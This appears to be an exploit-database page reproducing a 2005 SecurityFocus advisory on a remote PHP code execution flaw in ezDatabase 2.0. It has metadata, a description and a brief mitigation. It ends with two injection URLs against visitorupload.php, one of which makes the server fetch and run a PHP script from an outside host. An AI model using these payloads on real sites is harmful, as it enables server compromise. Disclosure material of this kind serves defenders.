header-logo
Suggest Exploit
vendor:
ezDatabase
by:
SecurityFocus
7.5
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: ezDatabase
Affected Version From: 2
Affected Version To: 2
Patch Exists: YES
Related CWE: N/A
CPE: a:ezdatabase:ezdatabase
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

ezDatabase Remote PHP Script Code Execution Vulnerability

ezDatabase is prone to a remote PHP script code execution vulnerability. An attacker can exploit this issue to execute arbitrary malicious PHP code and execute it in the context of the Web server process. These may facilitate a compromise of the application and the underlying system; other attacks are also possible.

Mitigation:

Ensure that the application is kept up to date with the latest security patches and updates.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16237/info

ezDatabase is prone to a remote PHP script code execution vulnerability.

An attacker can exploit this issue to execute arbitrary malicious PHP code and execute it in the context of the Web server process. These may facilitate a compromise of the application and the underlying system; other attacks are also possible.

ezDatabase version 2.0 is vulnerable to these issues; other versions may also be affected. 

http://www.example.com/visitorupload.php?db_id=;phpinfo()
http://www.example.com/visitorupload.php?db_id=;include(_GET[test])&test=http://www.example2.com/script.php

Navigation

Suggest Exploit

Services By CQR